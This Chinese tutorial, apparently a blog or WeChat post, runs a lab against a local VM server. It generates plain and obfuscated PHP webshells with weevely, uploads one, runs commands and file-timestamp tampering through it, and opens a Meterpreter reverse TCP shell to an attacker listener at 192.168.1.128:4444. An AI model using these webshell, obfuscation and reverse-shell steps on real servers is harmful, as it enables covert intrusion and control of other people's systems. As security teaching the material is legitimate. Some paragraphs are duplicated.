一位苦于信息安全的萌新小白帽
本实验仅用于信息防御教学,切勿用于它用途
公众号:XG小刚
小实验
目的 今天使用一下kali系统下的中国菜刀 weevely ,生成木马文件、混淆木马文件控制Web服务器,并进一步 反弹shell 给metasploit做进一步控制。 实验环境 VM搭建的虚拟测试环境
1.phpstudy搭建主机 192.168.1.1
2.kali 192.168.1.128 Weevely
介绍 weevely是一款使用python编写的webshell工具,很多说是linux下的中国菜刀,但只能用于PHP。 weevely在 linux 上使用非常给力,但是在windows上很多模块无法使用 使用
实验
使用weevely生成php木马文件
上面生成的是 普通木马 文件,下面生成的是基于weevely模板生成的 混淆木马 ,起到一定的 防查杀 作用 (实际作用不大,照样能被腾讯、360全家桶扫出来。) weevely generate -h 查看参数,其中 -obfuscator 是用来使用混淆模板的,有两个自带模板,我们使用第二个生成木马文件shell2.php
然后复制url链接
目的 今天使用一下kali系统下的中国菜刀 weevely ,生成木马文件、混淆木马文件控制Web服务器,并进一步 反弹shell 给metasploit做进一步控制。 实验环境 VM搭建的虚拟测试环境
1.phpstudy搭建主机 192.168.1.1
2.kali 192.168.1.128 Weevely
介绍 weevely是一款使用python编写的webshell工具,很多说是linux下的中国菜刀,但只能用于PHP。 weevely在 linux 上使用非常给力,但是在windows上很多模块无法使用 使用
生成shell | wevely generate |
---|---|
连接shell | weevely [cmd] |
生成混淆shell | weevely generate -obfuscator |
使用weevely生成php木马文件
weevely generate XG ~/shell.php
这里看到,生成一个大小779byte大小的PHP木马文件,密码是XG,文件名shell.php上面生成的是 普通木马 文件,下面生成的是基于weevely模板生成的 混淆木马 ,起到一定的 防查杀 作用 (实际作用不大,照样能被腾讯、360全家桶扫出来。) weevely generate -h 查看参数,其中 -obfuscator 是用来使用混淆模板的,有两个自带模板,我们使用第二个生成木马文件shell2.php
weevely generate -obfuscator cleartext1_php XG shell2.php
将木马文件上传到被攻击web服务器
这里的上传过程看你要攻击的站点了,有文件上传漏洞,代码执行等等,反正能把木马文件上传到web目录下就行。并要知道木马所在的文件目录。
由于是我自己搭建的web,就直接拖拽进去了。开启phpstudy。
然后复制url链接
使用weevely连接木马文件
weevely http://192.168.1.1/shell/shell.php XG
查看ip地址,已经连接到主机192.168.1.1
同样的方式,连接生成的混淆shell2.php
控制参数
连接上shell就相当于控制服务器了,可以在weevely状态下发?来查看可以使用的命令,这里列出几个常用命令。
信息搜集::system_info收集系统信息:system_info -info client_ip whoami hostname查找自己连接的ip文件管理:file_touch 修改文件时间:file_touch -human-ts '2018-09-15 200:41:20' 文件名命令执行:shell_php 执行PHP命令:shell_php system('dir');
反向shell连接msf
连接上的weevely功能虽然很强大了,但是不要忘了更强的神器metasploit,我们可以使用weevely转发到msf进而最深度的控制服务器。
在这使用:backdoor_meterpreter参数
weevely>:backdoor_meterpreter -payload php/meterpreter/reverse_tcp -lhost 192.168.1.128 -port 4444
:backdoor_meterpreter | 反向shell |
---|---|
-payload php/meterpreter/reverse_tcp | 是搭载的攻击载荷 |
-lhost | 转发给监听的ip地址 |
-port | 就是监听端口了 |
转发完成,接下来就是打开msf使用监听模块监听,获取控制权
use exploit/multi/handlershow payloadsset payload php/meterpreter/reverse_tcpset Lhost 192.168.1.128
最后run一下就可以监听到,并进一步控制web服务器了。
总结
weevely用起来也算是菜刀的一种变形,但是搭配起msf可以说是无敌的存在。
weevely在Linux下使用很友好,但在windows下还是使用菜刀,蚁剑和冰蝎吧。
msf控制后的使用命令特别特别多,功能特别强大,所以说msf是渗透神器嘛。(提醒一下,真正进行渗透时的ip地址,要么两个主机在同一个内网网段,要么在同一个公网,不然连接不上。)